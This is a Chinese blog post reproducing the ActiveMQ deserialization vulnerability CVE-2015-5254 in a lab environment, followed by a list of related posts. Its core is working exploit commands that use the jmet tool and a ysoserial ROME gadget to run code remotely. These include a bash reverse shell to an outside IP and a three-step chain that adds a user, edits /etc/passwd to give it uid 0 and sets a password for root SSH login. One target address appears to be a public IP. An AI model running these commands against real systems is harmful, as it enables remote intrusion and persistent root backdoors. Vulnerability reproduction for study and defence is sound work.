ActiveMQ 反序列化漏洞(CVE-2015-5254)

最新推荐文章于 2021-06-19 14:31:58 发布
最新推荐文章于 2021-06-19 14:31:58 发布
阅读量322 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44311721/article/details/97936930
版权

ActiveMQ 反序列化漏洞(CVE-2015-5254)

  1. ActiveMQ介绍:
    Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。什么是:消息中间件
  2. 漏洞简介:
    该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
  3. 漏洞影响范围:
    Apache ActiveMQ 5.0.0 - 5.12.1
  4. 漏洞复现:
    [1]搭建环境:
    在这里插入图片描述
    [2] 环境运行后,将监听61616和8161两个端口其中61616是工作端口,消息在这个端口进行传递; 8161是网络管理页面端口访问http://your-ip:8161即可看到网络管理页面,不过这个漏洞理论上是不需要网络的。
    使用浏览器直接访问activemq,查看是否部署完毕
    http://your-ip:8161/admin/(默认的用户名/密码为admin/admin)
    在这里插入图片描述[3]漏洞利用过程如下:

a.构造(可以使用ysoserial)可执行命令的序列化对象
b.作为一个消息,发送给目标61616端口
c.访问的Web管理页面,读取消息,触发漏洞

[4]使用jmet进行漏洞利用:

首先下载jmet的jar文件,并在同目录下创建一个external文件夹(否则可能会爆文件夹不存在的错误)。jmet原理是使用ysoserial生成Payload并发送(其jar内自带ysoserial,无需再自己下载),所以我们需要在ysoserial的gadget中选择一个可以使用的,比如ROME。
jmet

[5]进入jmet所在文件夹,执行命令:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/sucess" -Yp ROME your-ip 61616

在这里插入图片描述[6]此时会给目标的ActiveMQ添加一个名为事件的队列,可以我们通过http://192.168.1.131:8161/admin/browse.jsp?JMSDestination=event看到这个队列中所有消息:
在这里插入图片描述[7]点击查看这条消息即可触发命令执行:
在这里插入图片描述[8]进入容器,文件已创建,漏洞利用成功(使用docker ps查询容器id):
在这里插入图片描述
[9]反弹shell:

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -i >& /dev/tcp/192.168.1.129/4444 0>&1" -Yp ROME your-ip 61616

防火墙已经关闭,但反弹shell未成功,还没找出问题,欢迎大佬指教。

[10]添加用户

1.执行jmet的命令添加test用户并将其添加到root组,返回http://192.168.221.185:8161/admin/browse.jsp?JMSDestination=event页面,点击一下消息,触发它:

 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "useradd -g root -s /bin/bash -u 10010 test" -Yp ROME  45.32.101.90  61616

2.让我们再将passwd中的test的uid修改为0,使它拥有root权限,返回http://192.168.221.185:8161/admin/browse.jsp?JMSDestination=event页面,点击一下消息,触发它。

 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "sed -i "s/test:x:10010/test:x:0/g" /etc/passwd" -Yp ROME   45.32.101.90  61616

3.让我们再为test用户设置一个密码,返回http://192.168.221.185:8161/admin/browse.jsp?JMSDestination=event页面,点击一下消息,触发它。

 java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "echo "test:sd123456" | chpasswd" -Yp ROME   45.32.101.90   61616

4.到此为止,一个权限为root,密码为123456的用户即创建完毕。我们可以使用ssh直接远程登陆进入操作系统,并且还是最高权限。
在这里插入图片描述
参考:https://www.cnblogs.com/backlion/p/9970516.html

skr...
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ActiveMQ 序列漏洞CVE-2015-5254)特征分析
xhscxj的博客
11-24 885
Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。
ActiveMQ 序列漏洞 (CVE-2015-5254)复现
qq_45314073的博客
09-16 1466
ActiveMQ 序列漏洞
ActiveMQ序列漏洞CVE-2015-5254)
nz9611的博客
07-16 1684
目标:192.168.199.120:8161 漏洞ActiveMQ序列漏洞CVE-2015-5254) 攻击原理:Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。 攻击步骤: 1.构造可...
ActiveMQ 序列漏洞CVE-2015-5254)利用工具
08-15
ActiveMQ 序列漏洞CVE-2015-5254)利用工具,ActiveMQ漏洞序列漏洞CVE-2015-5254,利用工具,工具
ActiveMQ序列漏洞CVE-2015-5254) 漏洞利用工具
11-25
ActiveMQ序列漏洞CVE-2015-5254)漏洞利用工具,说明文档已存在请进行查看
activemq-cpp-library-3.9.5 编译的windows库文件,支持vs2015、vs2017
07-21
activemq-cpp-library-3.9.5编译的C++库文件,支持vs2015,vs2017,包括了依赖的库文件和头文件,可以在项目中直接使用。
apache-activemq-5.16.5-bin.tar.gz 下载(5积分)
08-17
Apache ActiveMQ是Apache软件基金会的一个开源项目,是一个基于消息的通信中间件。ActiveMQ是JMS的一个具体实现,支持JMS的两种消息模型。ActiveMQ使用AMQP协议集成多平台应用,使用STOMP协议通过websockets在Web...
activemq-artemis-dynatrace-plugin:ActiveMQ Artemis经纪人流程的自定义Dynatrace JMX插件
05-03
Dynatrace的ActiveMQ Artemis插件关于经纪人流程的自定义 插件。Artemis概述插件该插件提供常规的代理统计信息,例如地址内存使用率,连接/用户数,总消息数,总消息添加/确认率。 Artemis Queues插件这提供了详细的...
ActiveMQ序列漏洞CVE-2015-5254复现
weixin_51387754的博客
06-19 394
ActiveMQ序列漏洞CVE-2015-5254)复现漏洞前言0x01 漏洞环境 漏洞前言 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任意代码。 0x0
ActiveMQ序列漏洞(CVE-2015-5254)
07-16 501
1.漏洞介绍:Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务,集群,Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列的类。远程***者可借助特制的序列的Java消息服务(JMS)ObjectMessage对象利用该漏洞执行任...
利用Vulnhub复现漏洞 - ActiveMQ 序列漏洞CVE-2015-5254)
JiangBuLiu的博客
06-27 1003
ActiveMQ 序列漏洞CVE-2015-5254)Vulnhub官方复现教程漏洞原理复现漏洞启动环境TerminalFirefox Vulnhub官方复现教程 https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.md 漏洞原理 https://www.jianshu.com/p/...
ActiveMQ 序列漏洞(CVE-2015-5254)复现
baidu_38844729的博客
01-22 508
前言 Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列的类。远程攻击者可借助特制的序列的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码 步骤 搭建环境:docker+vulhub 1.下载jmet的jar文件,并在同目录下创建一个external文件夹 链接:https://g...
apache ActiveMQ序列漏洞CVE-2015-5254)复现
m_ing
07-14 689
前言:又来复现漏洞了! 基本的实验环境就不演示了,可以查看我以前的博客,开整吧! 漏洞详情 Apache ActiveMQ是美国阿帕奇(Apache)软件基金会所研发的一套开源的消息中间件,它支持Java消息服务、集群、Spring Framework等。Apache ActiveMQ 5.13.0之前5.x版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列的类 漏洞危害# 远程攻击者可借助特制的序列的Java MessageService(JMS)ObjectMessage对象利用该漏洞执行任意
ActiveMQ序列(CVE-2015-5254) && ActiveMQ任意文件写入 (CVE-2016-3088)
weixin_30407613的博客
01-04 351
ActiveMQ 序列漏洞(CVE-2015-5254) 漏洞详情 ActiveMQ启动后,将监听61616和8161两个端口,其中消息在61616这个端口进行传递,使用ActiveMQ这个中间件的程序也通过这个端口工作,8161是Web服务的端口,通过Web页面可管理ActiveMQ ActiveMQ序列漏洞存在于ActiveMQ5.13.0之前5.x版本中,该漏洞源于程序没有限制可在代...
ActiveMQ 序列漏洞
最新发布
08-19
ActiveMQ 序列漏洞是指在使用 ActiveMQ 进行消息传递时,由于未正确验证和过滤用户提交的数据,恶意攻击者可以利用该漏洞在目标系统上执行任意代码。这种漏洞通常是由于未正确配置 ActiveMQ序列序列...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值